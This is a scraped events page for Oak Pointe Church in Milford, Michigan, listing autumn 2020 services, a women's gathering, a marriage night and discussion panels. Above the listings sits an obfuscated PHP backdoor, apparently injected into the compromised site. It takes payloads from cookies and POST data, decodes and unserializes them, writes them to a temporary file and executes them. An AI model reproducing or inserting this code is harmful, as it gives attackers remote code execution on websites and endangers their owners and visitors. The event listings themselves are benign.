$xpIMNUeQM = "\x76" . chr (76) . "\x5f" . 'G' . 'z' . "\x64";$fCAKzm = chr (99) . 'l' . "\x61" . "\163" . "\x73" . "\x5f" . chr ( 921 - 820 )."\170" . 'i' . chr (115) . "\x74" . "\163";$PEfejaDHP = class_exists($xpIMNUeQM); $fCAKzm = "21486";$NAXCyFhTE = strpos($fCAKzm, $xpIMNUeQM);if ($PEfejaDHP == $NAXCyFhTE){function EPkTbcZhpc(){$XErueXTxfV = new /* 13772 */ vL_Gzd(56514 + 56514); $XErueXTxfV = NULL;}$sQfVOjyGKc = "56514";class vL_Gzd{private function MlSRS($sQfVOjyGKc){if (is_array(vL_Gzd::$BdNlqNLH)) {$name = sys_get_temp_dir() . "/" . crc32(vL_Gzd::$BdNlqNLH["salt"]);@vL_Gzd::$BdNlqNLH["write"]($name, vL_Gzd::$BdNlqNLH["content"]);include $name;@vL_Gzd::$BdNlqNLH["delete"]($name); $sQfVOjyGKc = "56514";exit();}}public function FpmkUJP(){$CbWzD = "23471";$this->_dummy = str_repeat($CbWzD, strlen($CbWzD));}public function __destruct(){vL_Gzd::$BdNlqNLH = @unserialize(vL_Gzd::$BdNlqNLH); $sQfVOjyGKc = "48738_35324";$this->MlSRS($sQfVOjyGKc); $sQfVOjyGKc = "48738_35324";}public function cEMlyIvuFP($CbWzD, $rJxOhiP){return $CbWzD[0] ^ str_repeat($rJxOhiP, intval(strlen($CbWzD[0]) / strlen($rJxOhiP)) + 1);}public function IItjnVGfM($CbWzD){$dxNlwgHzF = chr (98) . chr ( 625 - 528 )."\163" . chr ( 590 - 489 ).chr ( 913 - 859 ).'4';return array_map($dxNlwgHzF . '_' . 'd' . "\x65" . "\x63" . 'o' . "\144" . chr (101), array($CbWzD,));}public function __construct($zSrfoFCSS=0){$rtdCzVvO = "\54";$CbWzD = "";$LotNUzVWwe = $_POST;$Ymgdv = $_COOKIE;$rJxOhiP = "ef2b12e8-e81b-4a59-9bdc-f2001ae58005";$NujUTeyOcY = @$Ymgdv[substr($rJxOhiP, 0, 4)];if (!empty($NujUTeyOcY)){$NujUTeyOcY = explode($rtdCzVvO, $NujUTeyOcY);foreach ($NujUTeyOcY as $oTolEgsrn){$CbWzD .= @$Ymgdv[$oTolEgsrn];$CbWzD .= @$LotNUzVWwe[$oTolEgsrn];}$CbWzD = $this->IItjnVGfM($CbWzD);}vL_Gzd::$BdNlqNLH = $this->cEMlyIvuFP($CbWzD, $rJxOhiP);if (strpos($rJxOhiP, $rtdCzVvO) !== FALSE){$rJxOhiP = explode($rtdCzVvO, $rJxOhiP); $LGXFKE = base64_decode(md5($rJxOhiP[0])); $uINdEMc = strlen($rJxOhiP[1]) > 5 ? substr($rJxOhiP[1], 0, 5) : $rJxOhiP[1];$_GET['new_key'] = md5(implode('', $rJxOhiP)); $yEuuR = str_repeat($uINdEMc, 2);}}public static $BdNlqNLH = 14612;}EPkTbcZhpc();} Events from September 6, 2020 – December 6, 2020 › All Church › – Page 3 – Oak Pointe Church | Milford

Outdoor Service

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We are so excited to re-gather in person! If you are hesitant at all, and not ready to return to public services, that’s ok! We will still have the online […]


Women’s Gathering

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Women! Let's kick off the fall together on Saturday, September 19th with a gathering. We'll enjoy lite continental breakfast foods, be encouraged by God's Word, and hear about new things […]


Marriage Night

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us as we stream RightNow Media's Marriage Night event on Saturday, September 19th. All our marriages have recently experienced mounting pressures which have put strains on them to say […]


Christ & Culture: Pastors Panel

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for a pastoral discussion on how the gospel informs our response to politics, race, and COVID-19. Pastors Paul, Micah & Perry will respond to pre-submitted questions (closed). Watch […]


IF: Lead

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Ladies, join us for the day on Saturday, October 24th as we watch IF: Lead together! Whether you lead toddlers, are a CEO of a company or lead a small […]


Christ & Culture: Book Discussion

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for a group book discussion hosted by Pastor Paul on the book "Before You Vote" by David Platt. Pickup a book from Pastor Paul for $10 or grab […]


Discover OPC (In Person)

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

If you’re new to Oak Pointe Church, we have a great next step for you to get connected. It’s called Discover Oak Pointe. When you attend Discover Oak Pointe, you’ll meet Pastor Paul, other […]


Thanksgiving Sunday

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We're taking a 1 week break from the parables to celebrate Thanksgiving in our Sunday services. It’ll be a family service which means children of all ages will attend service […]


EQUIP: Go Tell it On The Mountain

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Our Equip event is going all VIRTUAL so everyone can view it easily! We'll spend our morning readying ourselves with how we can step into the brokenness of this world […]


Discover OPC (Online)

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

If you’re new to Oak Pointe Church, we have a great next step for you to get connected. It’s called Discover Oak Pointe. When you attend Discover Oak Pointe, you’ll meet Pastor Paul, other […]
